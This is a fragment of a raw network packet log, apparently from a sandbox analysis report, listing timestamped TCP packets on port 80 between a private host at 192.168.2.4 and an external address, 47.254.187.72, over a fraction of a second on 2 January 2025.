                                                                            Jan 2, 2025 20:34:50.816281080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.816292048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.816302061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.816312075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.816323042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.816325903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.816334009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.816344976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.816350937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.816354990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.816376925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.816395044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.823064089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.823076010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.823086023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.823100090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.823117018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.823138952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.823153019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.823157072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.823168993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.823179960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.823184013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.823230028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.832653999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.832665920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.832684040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.832695007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.832705975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.832716942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.832727909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.832739115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.832746029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.832793951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.835954905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.835977077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.835988045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.835998058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.836009026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.836013079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.836019993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.836030960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.836036921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.836040020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.836057901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.836083889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.842161894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.842174053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.842185020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.842209101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.842223883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.842232943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.842236042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.842247009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.842257023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.842272997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.842308998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.846035004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846045971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846061945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846074104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846081972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.846090078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846107006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846117020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846126080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846136093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846141100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.846141100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.846148968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.846163034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.846191883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.898705006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.898721933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.898740053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.898756981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.898767948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.898782969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.898783922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.898797035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.898806095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.898829937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.898857117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.900873899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.900917053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.900938988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.900959015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.900970936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.900979996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.900985956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.900991917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.900998116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.901001930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.901022911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.901053905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.902595997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.902614117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.902623892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.902632952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.902646065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.902652025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.902662992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.902672052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.902673960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.902684927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.902704000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.902725935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.902990103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.903000116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.903012037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.903032064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.903053045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.903064966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.903069973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.903081894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.903091908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.903093100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.903104067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.903120041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.903151035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.905539989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.905550957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.905561924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.905587912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.905615091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.905620098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.905626059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.905642986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.905651093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.905653000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.905664921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.905669928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.905692101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.905715942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.906627893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906694889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.906697989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906708002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906725883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906737089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906738997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.906747103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906758070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906773090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906775951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.906784058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906812906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.906832933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906835079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.906842947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906855106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906866074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906874895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.906877995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906898022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.906923056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.906933069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.906965971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.907062054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.907073021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.907083988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.907094002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.907104969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.907105923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.907115936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.907120943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.907126904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.907136917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.907157898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.907176018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.917237997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.917279005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.917289019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.917300940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.917310953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.917319059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.917321920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.917330980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.917342901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.917350054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.917371035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.917386055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.919579029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.919589996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.919601917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.919619083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.919626951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.919640064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.919645071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.919656992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.919666052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.919668913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.919677973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.919727087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.919727087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.920563936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.920576096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.920587063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.920603991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.920628071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.920634031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.920641899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.920654058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.920665026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.920674086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.920685053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.920696974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.920696974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.920717001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.920747042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.923518896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.923530102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.923540115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.923549891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.923559904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.923572063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.923589945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.923590899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.923602104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.923608065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.923612118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.923624039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.923636913 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.923665047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.927196026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.927207947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.927231073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.927239895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.927242041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.927253008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.927272081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.927282095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.927293062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.927308083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.927336931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.928167105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.928209066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.928248882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.928260088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.928270102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.928281069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.928289890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.928292036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.928302050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.928317070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.928335905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.930922031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.930932999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.930948973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.930960894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.930969954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.930973053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.930983067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.930989027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.930994987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.931018114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.931045055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.932863951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.932882071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.932903051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.932914972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.932948112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.932959080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.932981968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.932986021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.932992935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.933002949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.933005095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.933026075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.933026075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.933044910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.933047056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.933063030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.933084011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.985604048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.985644102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.985655069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.985663891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.985666037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.985677958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.985690117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.985693932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.985701084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.985712051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.985722065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.985740900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.985758066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.987811089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.987832069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.987843037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.987855911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.987860918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.987868071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.987878084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.987889051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.987891912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.987927914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.987947941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.989459038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989471912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989483118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989492893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989505053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989505053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.989515066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989527941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989527941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.989557028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.989573956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.989749908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989762068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989772081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989801884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.989805937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989824057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989825010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.989835978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989845991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989845991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.989857912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.989870071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.989898920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.992383003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.992394924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.992404938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.992419958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.992436886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.992448092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.992449999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.992458105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.992470026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.992491961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.992515087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993387938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993407965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993417025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993428946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993446112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.993449926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.993484974 CET4973080192.168.2.447.254.187.72
